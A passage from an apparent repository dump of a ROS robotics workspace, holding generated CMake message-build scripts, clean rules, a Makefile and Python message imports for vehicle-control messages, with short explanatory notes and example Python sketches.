${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zfmsg)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/zfmsg\n DESTINATION ${gennodejs_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_nodejs)\n add_dependencies(zfmsg_generate_messages_nodejs std_msgs_generate_messages_nodejs)\nendif()\n\nif(genpy_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zfmsg)\n install(CODE \"execute_process(COMMAND \\\"/usr/bin/python\\\" -m compileall \\\"${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zfmsg\\\")\")\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/zfmsg\n DESTINATION ${genpy_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_py)\n add_dependencies(zfmsg_generate_messages_py std_msgs_generate_messages_py)\nendif()\n"
},
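The generated rules above push the six zfmsg definitions through gencpp/geneus/genlisp/gennodejs/genpy; once the `zfmsg_generate_messages_py` target has run, the classes are importable from Python. Below is a minimal publisher sketch, not taken from the repo: it assumes the devel space is on PYTHONPATH, a ROS master is running, that CanInfo carries the conventional `header` field (std_msgs/Header is listed as a dependency of every zfmsg message above), and the topic name `can_info` is invented for illustration.

#!/usr/bin/env python
# Minimal sketch, not from the repo: publish a generated zfmsg message.
# Assumes CanInfo has the conventional 'header' field (std_msgs/Header is
# a declared dependency of every zfmsg message in the rules above).
import rospy
from std_msgs.msg import Header
from zfmsg.msg import CanInfo  # produced by zfmsg_generate_messages_py


def main():
    rospy.init_node('caninfo_demo')
    pub = rospy.Publisher('can_info', CanInfo, queue_size=10)  # topic name is illustrative
    rate = rospy.Rate(10)  # 10 Hz
    while not rospy.is_shutdown():
        msg = CanInfo()
        msg.header = Header(stamp=rospy.Time.now(), frame_id='base_link')
        pub.publish(msg)
        rate.sleep()


if __name__ == '__main__':
    main()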
{
"alpha_fraction": 0.761457085609436,
"alphanum_fraction": 0.794359564781189,
"avg_line_length": 55.733333587646484,
"blob_id": "e4d9b2d0ebc81a9d73ccd2e5b4601816d5bc6fe0",
"content_id": "1b6080e1b918f8c6cdde2b4e9355c3932125b6bf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 851,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 15,
"path": "/build/zfmsg/CMakeFiles/zfmsg_generate_messages_eus.dir/cmake_clean.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "file(REMOVE_RECURSE\n \"CMakeFiles/zfmsg_generate_messages_eus\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/roseus/ros/zfmsg/msg/BreakStatus.l\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/roseus/ros/zfmsg/msg/SteerStatus.l\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/roseus/ros/zfmsg/msg/ThrottleGearStatus.l\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/roseus/ros/zfmsg/msg/MotionCmd.l\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/roseus/ros/zfmsg/msg/CanInfo.l\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/roseus/ros/zfmsg/msg/CanInfoAW.l\"\n \"/home/zf/xuechong_ws/zhuifengShow0919/devel/share/roseus/ros/zfmsg/manifest.l\"\n)\n\n# Per-language clean rules from dependency scanning.\nforeach(lang )\n include(CMakeFiles/zfmsg_generate_messages_eus.dir/cmake_clean_${lang}.cmake OPTIONAL)\nendforeach()\n"
},
{
"alpha_fraction": 0.7485029697418213,
"alphanum_fraction": 0.7485029697418213,
"avg_line_length": 26.83333396911621,
"blob_id": "16394d6d980a4bdd97497963ac1dce1b382e26f7",
"content_id": "7baf53b20840dd8c7a4ddd28495b3625f2113890",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 167,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 6,
"path": "/devel/lib/python2.7/dist-packages/zfmsg/msg/__init__.py",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "from ._BreakStatus import *\nfrom ._CanInfo import *\nfrom ._CanInfoAW import *\nfrom ._MotionCmd import *\nfrom ._SteerStatus import *\nfrom ._ThrottleGearStatus import *\n"
},
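The `__init__.py` above simply star-imports each generated module, which is why `from zfmsg.msg import MotionCmd` and friends resolve. A small sketch (assuming the devel-space dist-packages directory is on PYTHONPATH) confirming that all six classes are reachable through the package namespace; `_type` and `_md5sum` are standard attributes on genpy-generated classes.

# Sketch: verify the star-imports above expose every generated class.
# Assumes the devel-space dist-packages directory is on PYTHONPATH.
import zfmsg.msg as zm

for name in ('BreakStatus', 'CanInfo', 'CanInfoAW',
             'MotionCmd', 'SteerStatus', 'ThrottleGearStatus'):
    cls = getattr(zm, name)
    # genpy-generated classes carry their ROS type name and md5 checksum
    print(name, cls._type, cls._md5sum)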
{
"alpha_fraction": 0.7433920502662659,
"alphanum_fraction": 0.7734423875808716,
"avg_line_length": 29.70531463623047,
"blob_id": "08bd68394e17258f587ac6d4039504ab3aac582a",
"content_id": "65d8f0110f62d8f8879a710d220f7fd11704ce4b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "CMake",
"length_bytes": 6356,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 207,
"path": "/build/pos320/cmake/pos320-genmsg.cmake",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# generated from genmsg/cmake/pkg-genmsg.cmake.em\n\nmessage(WARNING \"Invoking generate_messages() without having added any message or service file before.\nYou should either add add_message_files() and/or add_service_files() calls or remove the invocation of generate_messages().\")\nmessage(STATUS \"pos320: 0 messages, 0 services\")\n\nset(MSG_I_FLAGS \"-Istd_msgs:/opt/ros/kinetic/share/std_msgs/cmake/../msg\")\n\n# Find all generators\nfind_package(gencpp REQUIRED)\nfind_package(geneus REQUIRED)\nfind_package(genlisp REQUIRED)\nfind_package(gennodejs REQUIRED)\nfind_package(genpy REQUIRED)\n\nadd_custom_target(pos320_generate_messages ALL)\n\n# verify that message/service dependencies have not changed since configure\n\n\n\n#\n# langs = gencpp;geneus;genlisp;gennodejs;genpy\n#\n\n### Section generating for lang: gencpp\n### Generating Messages\n\n### Generating Services\n\n### Generating Module File\n_generate_module_cpp(pos320\n ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/pos320\n \"${ALL_GEN_OUTPUT_FILES_cpp}\"\n)\n\nadd_custom_target(pos320_generate_messages_cpp\n DEPENDS ${ALL_GEN_OUTPUT_FILES_cpp}\n)\nadd_dependencies(pos320_generate_messages pos320_generate_messages_cpp)\n\n# add dependencies to all check dependencies targets\n\n# target for backward compatibility\nadd_custom_target(pos320_gencpp)\nadd_dependencies(pos320_gencpp pos320_generate_messages_cpp)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS pos320_generate_messages_cpp)\n\n### Section generating for lang: geneus\n### Generating Messages\n\n### Generating Services\n\n### Generating Module File\n_generate_module_eus(pos320\n ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/pos320\n \"${ALL_GEN_OUTPUT_FILES_eus}\"\n)\n\nadd_custom_target(pos320_generate_messages_eus\n DEPENDS ${ALL_GEN_OUTPUT_FILES_eus}\n)\nadd_dependencies(pos320_generate_messages pos320_generate_messages_eus)\n\n# add dependencies to all check dependencies targets\n\n# target for backward compatibility\nadd_custom_target(pos320_geneus)\nadd_dependencies(pos320_geneus pos320_generate_messages_eus)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS pos320_generate_messages_eus)\n\n### Section generating for lang: genlisp\n### Generating Messages\n\n### Generating Services\n\n### Generating Module File\n_generate_module_lisp(pos320\n ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/pos320\n \"${ALL_GEN_OUTPUT_FILES_lisp}\"\n)\n\nadd_custom_target(pos320_generate_messages_lisp\n DEPENDS ${ALL_GEN_OUTPUT_FILES_lisp}\n)\nadd_dependencies(pos320_generate_messages pos320_generate_messages_lisp)\n\n# add dependencies to all check dependencies targets\n\n# target for backward compatibility\nadd_custom_target(pos320_genlisp)\nadd_dependencies(pos320_genlisp pos320_generate_messages_lisp)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS pos320_generate_messages_lisp)\n\n### Section generating for lang: gennodejs\n### Generating Messages\n\n### Generating Services\n\n### Generating Module File\n_generate_module_nodejs(pos320\n ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/pos320\n \"${ALL_GEN_OUTPUT_FILES_nodejs}\"\n)\n\nadd_custom_target(pos320_generate_messages_nodejs\n DEPENDS ${ALL_GEN_OUTPUT_FILES_nodejs}\n)\nadd_dependencies(pos320_generate_messages pos320_generate_messages_nodejs)\n\n# add dependencies to all check dependencies targets\n\n# target for backward 
compatibility\nadd_custom_target(pos320_gennodejs)\nadd_dependencies(pos320_gennodejs pos320_generate_messages_nodejs)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS pos320_generate_messages_nodejs)\n\n### Section generating for lang: genpy\n### Generating Messages\n\n### Generating Services\n\n### Generating Module File\n_generate_module_py(pos320\n ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/pos320\n \"${ALL_GEN_OUTPUT_FILES_py}\"\n)\n\nadd_custom_target(pos320_generate_messages_py\n DEPENDS ${ALL_GEN_OUTPUT_FILES_py}\n)\nadd_dependencies(pos320_generate_messages pos320_generate_messages_py)\n\n# add dependencies to all check dependencies targets\n\n# target for backward compatibility\nadd_custom_target(pos320_genpy)\nadd_dependencies(pos320_genpy pos320_generate_messages_py)\n\n# register target for catkin_package(EXPORTED_TARGETS)\nlist(APPEND ${PROJECT_NAME}_EXPORTED_TARGETS pos320_generate_messages_py)\n\n\n\nif(gencpp_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/pos320)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${gencpp_INSTALL_DIR}/pos320\n DESTINATION ${gencpp_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_cpp)\n add_dependencies(pos320_generate_messages_cpp std_msgs_generate_messages_cpp)\nendif()\n\nif(geneus_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/pos320)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${geneus_INSTALL_DIR}/pos320\n DESTINATION ${geneus_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_eus)\n add_dependencies(pos320_generate_messages_eus std_msgs_generate_messages_eus)\nendif()\n\nif(genlisp_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/pos320)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${genlisp_INSTALL_DIR}/pos320\n DESTINATION ${genlisp_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_lisp)\n add_dependencies(pos320_generate_messages_lisp std_msgs_generate_messages_lisp)\nendif()\n\nif(gennodejs_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/pos320)\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${gennodejs_INSTALL_DIR}/pos320\n DESTINATION ${gennodejs_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_nodejs)\n add_dependencies(pos320_generate_messages_nodejs std_msgs_generate_messages_nodejs)\nendif()\n\nif(genpy_INSTALL_DIR AND EXISTS ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/pos320)\n install(CODE \"execute_process(COMMAND \\\"/usr/bin/python\\\" -m compileall \\\"${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/pos320\\\")\")\n # install generated code\n install(\n DIRECTORY ${CATKIN_DEVEL_PREFIX}/${genpy_INSTALL_DIR}/pos320\n DESTINATION ${genpy_INSTALL_DIR}\n )\nendif()\nif(TARGET std_msgs_generate_messages_py)\n add_dependencies(pos320_generate_messages_py std_msgs_generate_messages_py)\nendif()\n"
},
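Unlike the zfmsg file, pos320-genmsg.cmake above is generated with genmsg's warning baked in: the package invokes generate_messages() while declaring "0 messages, 0 services", so every per-language section is empty. The stand-alone sketch below mimics that tally purely for illustration — the `pkg_dir` argument and the output wording are mine, not genmsg's.

# Sketch: reproduce the "N messages, M services" count behind the genmsg
# warning embedded above. pkg_dir is a hypothetical command-line argument.
import os
import sys


def count_interfaces(pkg_dir):
    counts = {}
    for sub, ext in (('msg', '.msg'), ('srv', '.srv')):
        d = os.path.join(pkg_dir, sub)
        counts[sub] = sum(f.endswith(ext) for f in os.listdir(d)) if os.path.isdir(d) else 0
    return counts


if __name__ == '__main__':
    pkg = sys.argv[1] if len(sys.argv) > 1 else '.'
    c = count_interfaces(pkg)
    print('%s: %d messages, %d services'
          % (os.path.basename(os.path.abspath(pkg)), c['msg'], c['srv']))
    if c['msg'] == 0 and c['srv'] == 0:
        print('warning: generate_messages() would have nothing to generate')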
{
"alpha_fraction": 0.76113361120224,
"alphanum_fraction": 0.7725202441215515,
"avg_line_length": 42.013607025146484,
"blob_id": "b4dfa31aa865e16597551a5aba43e2cd2433bef2",
"content_id": "ec12c717ae63e461766f8ddf6afa6a36b52e2db9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 31616,
"license_type": "no_license",
"max_line_length": 221,
"num_lines": 735,
"path": "/build/path/Makefile",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# CMAKE generated file: DO NOT EDIT!\n# Generated by \"Unix Makefiles\" Generator, CMake Version 3.5\n\n# Default target executed when no arguments are given to make.\ndefault_target: all\n\n.PHONY : default_target\n\n# Allow only one \"make -f Makefile2\" at a time, but pass parallelism.\n.NOTPARALLEL:\n\n\n#=============================================================================\n# Special targets provided by cmake.\n\n# Disable implicit rules so canonical targets will work.\n.SUFFIXES:\n\n\n# Remove some rules from gmake that .SUFFIXES does not remove.\nSUFFIXES =\n\n.SUFFIXES: .hpux_make_needs_suffix_list\n\n\n# Suppress display of executed commands.\n$(VERBOSE).SILENT:\n\n\n# A target that is always out of date.\ncmake_force:\n\n.PHONY : cmake_force\n\n#=============================================================================\n# Set environment variables for the build.\n\n# The shell in which to execute make rules.\nSHELL = /bin/sh\n\n# The CMake executable.\nCMAKE_COMMAND = /usr/bin/cmake\n\n# The command to remove a file.\nRM = /usr/bin/cmake -E remove -f\n\n# Escaping for special characters.\nEQUALS = =\n\n# The top-level source directory on which CMake was run.\nCMAKE_SOURCE_DIR = /home/zf/xuechong_ws/zhuifengShow0919/src\n\n# The top-level build directory on which CMake was run.\nCMAKE_BINARY_DIR = /home/zf/xuechong_ws/zhuifengShow0919/build\n\n#=============================================================================\n# Targets provided globally by CMake.\n\n# Special rule for the target list_install_components\nlist_install_components:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Available install components are: \\\"Unspecified\\\"\"\n.PHONY : list_install_components\n\n# Special rule for the target list_install_components\nlist_install_components/fast: list_install_components\n\n.PHONY : list_install_components/fast\n\n# Special rule for the target edit_cache\nedit_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake cache editor...\"\n\t/usr/bin/ccmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : edit_cache\n\n# Special rule for the target edit_cache\nedit_cache/fast: edit_cache\n\n.PHONY : edit_cache/fast\n\n# Special rule for the target test\ntest:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running tests...\"\n\t/usr/bin/ctest --force-new-ctest-process $(ARGS)\n.PHONY : test\n\n# Special rule for the target test\ntest/fast: test\n\n.PHONY : test/fast\n\n# Special rule for the target install/strip\ninstall/strip: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing the project stripped...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_DO_STRIP=1 -P cmake_install.cmake\n.PHONY : install/strip\n\n# Special rule for the target install/strip\ninstall/strip/fast: install/strip\n\n.PHONY : install/strip/fast\n\n# Special rule for the target rebuild_cache\nrebuild_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake to regenerate build system...\"\n\t/usr/bin/cmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : rebuild_cache\n\n# Special rule for the target rebuild_cache\nrebuild_cache/fast: rebuild_cache\n\n.PHONY : rebuild_cache/fast\n\n# Special rule for the target install\ninstall: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install\n\n# Special rule for the target install\ninstall/fast: 
preinstall/fast\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install/fast\n\n# Special rule for the target install/local\ninstall/local: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing only the local directory...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_LOCAL_ONLY=1 -P cmake_install.cmake\n.PHONY : install/local\n\n# Special rule for the target install/local\ninstall/local/fast: install/local\n\n.PHONY : install/local/fast\n\n# The main all target\nall: cmake_check_build_system\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -E cmake_progress_start /home/zf/xuechong_ws/zhuifengShow0919/build/CMakeFiles /home/zf/xuechong_ws/zhuifengShow0919/build/path/CMakeFiles/progress.marks\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/all\n\t$(CMAKE_COMMAND) -E cmake_progress_start /home/zf/xuechong_ws/zhuifengShow0919/build/CMakeFiles 0\n.PHONY : all\n\n# The main clean target\nclean:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/clean\n.PHONY : clean\n\n# The main clean target\nclean/fast: clean\n\n.PHONY : clean/fast\n\n# Prepare targets for installation.\npreinstall: all\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/preinstall\n.PHONY : preinstall\n\n# Prepare targets for installation.\npreinstall/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/preinstall\n.PHONY : preinstall/fast\n\n# clear depends\ndepend:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 1\n.PHONY : depend\n\n# Convenience name for target.\npath/CMakeFiles/gps_planner.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/gps_planner.dir/rule\n.PHONY : path/CMakeFiles/gps_planner.dir/rule\n\n# Convenience name for target.\ngps_planner: path/CMakeFiles/gps_planner.dir/rule\n\n.PHONY : gps_planner\n\n# fast build rule for target.\ngps_planner/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/gps_planner.dir/build.make path/CMakeFiles/gps_planner.dir/build\n.PHONY : gps_planner/fast\n\n# Convenience name for target.\npath/CMakeFiles/path_genpy.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/path_genpy.dir/rule\n.PHONY : path/CMakeFiles/path_genpy.dir/rule\n\n# Convenience name for target.\npath_genpy: path/CMakeFiles/path_genpy.dir/rule\n\n.PHONY : path_genpy\n\n# fast build rule for target.\npath_genpy/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/path_genpy.dir/build.make path/CMakeFiles/path_genpy.dir/build\n.PHONY : path_genpy/fast\n\n# Convenience name for target.\npath/CMakeFiles/path_generate_messages_nodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/path_generate_messages_nodejs.dir/rule\n.PHONY : path/CMakeFiles/path_generate_messages_nodejs.dir/rule\n\n# Convenience name for target.\npath_generate_messages_nodejs: path/CMakeFiles/path_generate_messages_nodejs.dir/rule\n\n.PHONY : path_generate_messages_nodejs\n\n# fast build rule for target.\npath_generate_messages_nodejs/fast:\n\tcd 
/home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/path_generate_messages_nodejs.dir/build.make path/CMakeFiles/path_generate_messages_nodejs.dir/build\n.PHONY : path_generate_messages_nodejs/fast\n\n# Convenience name for target.\npath/CMakeFiles/path_genlisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/path_genlisp.dir/rule\n.PHONY : path/CMakeFiles/path_genlisp.dir/rule\n\n# Convenience name for target.\npath_genlisp: path/CMakeFiles/path_genlisp.dir/rule\n\n.PHONY : path_genlisp\n\n# fast build rule for target.\npath_genlisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/path_genlisp.dir/build.make path/CMakeFiles/path_genlisp.dir/build\n.PHONY : path_genlisp/fast\n\n# Convenience name for target.\npath/CMakeFiles/path_generate_messages_lisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/path_generate_messages_lisp.dir/rule\n.PHONY : path/CMakeFiles/path_generate_messages_lisp.dir/rule\n\n# Convenience name for target.\npath_generate_messages_lisp: path/CMakeFiles/path_generate_messages_lisp.dir/rule\n\n.PHONY : path_generate_messages_lisp\n\n# fast build rule for target.\npath_generate_messages_lisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/path_generate_messages_lisp.dir/build.make path/CMakeFiles/path_generate_messages_lisp.dir/build\n.PHONY : path_generate_messages_lisp/fast\n\n# Convenience name for target.\npath/CMakeFiles/path_generate_messages_eus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/path_generate_messages_eus.dir/rule\n.PHONY : path/CMakeFiles/path_generate_messages_eus.dir/rule\n\n# Convenience name for target.\npath_generate_messages_eus: path/CMakeFiles/path_generate_messages_eus.dir/rule\n\n.PHONY : path_generate_messages_eus\n\n# fast build rule for target.\npath_generate_messages_eus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/path_generate_messages_eus.dir/build.make path/CMakeFiles/path_generate_messages_eus.dir/build\n.PHONY : path_generate_messages_eus/fast\n\n# Convenience name for target.\npath/CMakeFiles/path_gencpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/path_gencpp.dir/rule\n.PHONY : path/CMakeFiles/path_gencpp.dir/rule\n\n# Convenience name for target.\npath_gencpp: path/CMakeFiles/path_gencpp.dir/rule\n\n.PHONY : path_gencpp\n\n# fast build rule for target.\npath_gencpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/path_gencpp.dir/build.make path/CMakeFiles/path_gencpp.dir/build\n.PHONY : path_gencpp/fast\n\n# Convenience name for target.\npath/CMakeFiles/rosgraph_msgs_generate_messages_cpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/rosgraph_msgs_generate_messages_cpp.dir/rule\n.PHONY : path/CMakeFiles/rosgraph_msgs_generate_messages_cpp.dir/rule\n\n# Convenience name for target.\nrosgraph_msgs_generate_messages_cpp: path/CMakeFiles/rosgraph_msgs_generate_messages_cpp.dir/rule\n\n.PHONY : rosgraph_msgs_generate_messages_cpp\n\n# fast build rule for target.\nrosgraph_msgs_generate_messages_cpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/rosgraph_msgs_generate_messages_cpp.dir/build.make 
path/CMakeFiles/rosgraph_msgs_generate_messages_cpp.dir/build\n.PHONY : rosgraph_msgs_generate_messages_cpp/fast\n\n# Convenience name for target.\npath/CMakeFiles/path_generate_messages_cpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/path_generate_messages_cpp.dir/rule\n.PHONY : path/CMakeFiles/path_generate_messages_cpp.dir/rule\n\n# Convenience name for target.\npath_generate_messages_cpp: path/CMakeFiles/path_generate_messages_cpp.dir/rule\n\n.PHONY : path_generate_messages_cpp\n\n# fast build rule for target.\npath_generate_messages_cpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/path_generate_messages_cpp.dir/build.make path/CMakeFiles/path_generate_messages_cpp.dir/build\n.PHONY : path_generate_messages_cpp/fast\n\n# Convenience name for target.\npath/CMakeFiles/path_gennodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/path_gennodejs.dir/rule\n.PHONY : path/CMakeFiles/path_gennodejs.dir/rule\n\n# Convenience name for target.\npath_gennodejs: path/CMakeFiles/path_gennodejs.dir/rule\n\n.PHONY : path_gennodejs\n\n# fast build rule for target.\npath_gennodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/path_gennodejs.dir/build.make path/CMakeFiles/path_gennodejs.dir/build\n.PHONY : path_gennodejs/fast\n\n# Convenience name for target.\npath/CMakeFiles/roscpp_generate_messages_py.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/roscpp_generate_messages_py.dir/rule\n.PHONY : path/CMakeFiles/roscpp_generate_messages_py.dir/rule\n\n# Convenience name for target.\nroscpp_generate_messages_py: path/CMakeFiles/roscpp_generate_messages_py.dir/rule\n\n.PHONY : roscpp_generate_messages_py\n\n# fast build rule for target.\nroscpp_generate_messages_py/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/roscpp_generate_messages_py.dir/build.make path/CMakeFiles/roscpp_generate_messages_py.dir/build\n.PHONY : roscpp_generate_messages_py/fast\n\n# Convenience name for target.\npath/CMakeFiles/rosgraph_msgs_generate_messages_eus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/rosgraph_msgs_generate_messages_eus.dir/rule\n.PHONY : path/CMakeFiles/rosgraph_msgs_generate_messages_eus.dir/rule\n\n# Convenience name for target.\nrosgraph_msgs_generate_messages_eus: path/CMakeFiles/rosgraph_msgs_generate_messages_eus.dir/rule\n\n.PHONY : rosgraph_msgs_generate_messages_eus\n\n# fast build rule for target.\nrosgraph_msgs_generate_messages_eus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f path/CMakeFiles/rosgraph_msgs_generate_messages_eus.dir/build.make path/CMakeFiles/rosgraph_msgs_generate_messages_eus.dir/build\n.PHONY : rosgraph_msgs_generate_messages_eus/fast\n\n# Convenience name for target.\npath/CMakeFiles/actionlib_msgs_generate_messages_eus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 path/CMakeFiles/actionlib_msgs_generate_messages_eus.dir/rule\n.PHONY : path/CMakeFiles/actionlib_msgs_generate_messages_eus.dir/rule\n\n# Convenience name for target.\nactionlib_msgs_generate_messages_eus: path/CMakeFiles/actionlib_msgs_generate_messages_eus.dir/rule\n\n.PHONY : actionlib_msgs_generate_messages_eus\n\n# fast build rule for 
